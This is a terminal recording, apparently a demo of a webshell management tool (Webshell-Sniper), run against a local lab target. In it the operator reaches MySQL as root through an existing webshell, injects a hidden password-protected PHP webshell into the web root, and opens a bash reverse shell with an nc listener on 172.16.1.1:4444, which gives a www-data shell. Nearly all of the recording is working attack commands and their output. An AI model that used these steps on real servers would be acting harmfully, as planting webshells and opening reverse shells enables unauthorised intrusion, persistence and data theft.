[44.1584, "o", "\u001b[?25l\u001b[?7l\u001b[86D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mdb\u001b[0m \u001b[0;31m--engine\u001b[0m \u001b[0;33mmysql\u001b[0m \u001b[0;31m--host\u001b[0m \u001b[0;33mdb\u001b[0m \u001b[0;31m--user\u001b[0m \u001b[0;33mroot\u001b[0m \u001b[0;31m--password\u001b[0m \u001b[0;33mroot\u001b[86D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[44.1592, "o", "\u001b[95m[+] [database:mysql] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[44.1644, "o", "\u001b[1;32m[+] Connected.\u001b[0m\r\n"]
[44.1757, "o", "\u001b[6n"]
[44.1769, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[44.1793, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.372, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.4339, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.4961, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.5576, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.6192, "o", "\u001b[?25l\u001b[?7l\u001b[0mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.6808, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.7427, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.8047, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.8666, "o", "\u001b[?25l\u001b[?7l\u001b[8D\u001b[0;32mdatabases\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.9288, "o", "\u001b[?25l\u001b[?7l\u001b[16D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mdatabases\u001b[16D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[46.9334, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36mDatabase/Schema   \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 mysql              \u2502\r\n\u2502 information_schema \u2502\r\n\u2502 performance_schema \u2502\r\n\u2502 sys                \u2502\r\n\u2502 benchmark          \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[46.9341, "o", "\u001b[6n"]
[46.9352, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.9364, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.7453, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.8069, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.8689, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.9307, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.9922, "o", "\u001b[?25l\u001b[?7l\u001b[11D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mquit\u001b[11D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[48.9933, "o", "\u001b[6n"]
[48.9939, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.9947, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.201, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[0;38;2;102;102;102md\b\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.2633, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.3257, "o", "\u001b[?25l\u001b[?7l\u001b[0mj\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.3876, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.4492, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.5108, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;32minject\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.5724, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.634, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.6958, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.7575, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.8193, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.881, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.9426, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.0043, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.0661, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.1278, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.1896, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.2512, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.3129, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.3747, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.4364, "o", "\u001b[?25l\u001b[?7l\u001b[0;31md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.4981, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.5598, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.6215, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.6832, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.7448, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.8066, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.8683, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.9304, "o", "\u001b[?25l\u001b[?7l\u001b[53D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32minject\u001b[0m \u001b[0;33mweb\u001b[0m \u001b[0;31m--password\u001b[0m \u001b[0;33ms3cr3t\u001b[53D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.9305, "o", "\u001b[?2004l"]
[51.9316, "o", "\u001b[95m[+] [inject] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[51.9356, "o", "\u001b[1;32m[+] Injected: http://127.0.0.1:8080/.DBCXhCEpWmFNNmaP.php (password=s3cr3t)\u001b[0m\r\n"]
[51.9377, "o", "\u001b[1;32m[+] Verified reachable: http://127.0.0.1:8080/.DBCXhCEpWmFNNmaP.php\u001b[0m\r\n"]
[51.9382, "o", "\u001b[6n"]
[51.9389, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.9397, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.3492, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[0;38;2;102;102;102mivot db --engine mysql --host db --user root --password root\u001b[60D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.4108, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.4725, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.5341, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.5956, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.6572, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.7189, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[0;38;2;102;102;102mcan --hosts 172.16.1.0/29 -\u001b[Cports\u001b[C3306,5432\u001b[0m\u001b[K\u001b[43D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.781, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.8427, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.9044, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.9661, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.0278, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.0895, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.1511, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-i\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.2128, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.2745, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.3361, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m7\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.3978, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.4595, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.5212, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.583, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m6\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.6448, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.707, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.7686, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.8304, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.8926, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.9543, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.0161, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-p\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.0778, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.1401, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.2018, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.2636, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.3254, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.3871, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.4487, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.5106, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-m\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.5723, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.6342, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.6961, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.758, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.8198, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.8819, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[56.9441, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.0059, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.0678, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.1297, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.1916, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.2536, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.3161, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.3788, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.4407, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.5027, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.5646, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.6267, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.6891, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.7511, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.813, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.8749, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.9368, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.9987, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[58.0607, "o", "\u001b[?25l\u001b[?7l\u001b[85D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mshell\u001b[0m \u001b[0;31m-i\u001b[0m \u001b[0;33m172.16.1.1\u001b[0m \u001b[0;31m-p\u001b[0m \u001b[0;33m4444\u001b[0m \u001b[0;31m-m\u001b[0m \u001b[0;33mbash\u001b[0m \u001b[0;31m--listen\u001b[0m \u001b[0;31m--tool\u001b[0m \u001b[0;33mnc\u001b[85D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[58.0616, "o", "\u001b[1;32m[+] Listening on :4444 (nc); the shell should connect shortly.\u001b[0m\r\n"]
[58.0624, "o", "Listening on 0.0.0.0 4444\r\n"]
[59.0657, "o", "\u001b[1;32m[+] Trying bash reverse shell (/usr/bin/bash) -> 172.16.1.1:4444\u001b[0m\r\n"]
[59.0677, "o", "Connection received on 172.16.1.5 41812\r\n"]
[59.0681, "o", "sh: 0: "]
[59.0681, "o", "can't access tty; job control turned off"]
[59.0681, "o", "\r\n"]
[59.0681, "o", "$ "]
[61.0751, "o", "i"]
[61.1354, "o", "d"]
[61.1956, "o", "\r\n"]
[61.1965, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n"]
[61.1966, "o", "$ "]
[62.8017, "o", "u"]
[62.8619, "o", "n"]
[62.9222, "o", "a"]
[62.9824, "o", "m"]
[63.0427, "o", "e"]
[63.103, "o", " "]
[63.1632, "o", "-"]
[63.2235, "o", "a"]
[63.2837, "o", "\r\n"]
[63.2843, "o", "Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 19:26:24 UTC 2026 x86_64 GNU/Linux\r\n"]
[63.2843, "o", "$ "]
[65.0911, "o", "e"]
[65.1513, "o", "x"]
[65.2115, "o", "i"]
[65.2718, "o", "t"]
[65.332, "o", "\r\n"]
[65.3333, "o", "\u001b[33m[!] bash returned without connecting; trying next method.\u001b[0m\r\n"]
[65.334, "o", "\u001b[6n"]
[65.3347, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.3349, "o", "\u001b[25D\u001b[J\u001b[0m\u001b[?7h\u001b[?2004l"]
[65.335, "o", "\u001b[?7h?[1;31m[-] No reverse-shell method succeeded.?[0m\r\n"]
[65.335, "o", "\u001b[6n"]
[65.3356, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.3363, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.943, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[67.0047, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[67.0663, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[67.1279, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[67.1896, "o", "\u001b[?25l\u001b[?7l\u001b[29D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mquit\u001b[29D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[67.1896, "o", "\u001b[?2004l"]
[67.1903, "o", "\u001b[95m[+] Saved session (1 shell(s)) to \u001b[0m\r\n\u001b[95m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/session_1782488034.json\u001b[0m\r\n"]
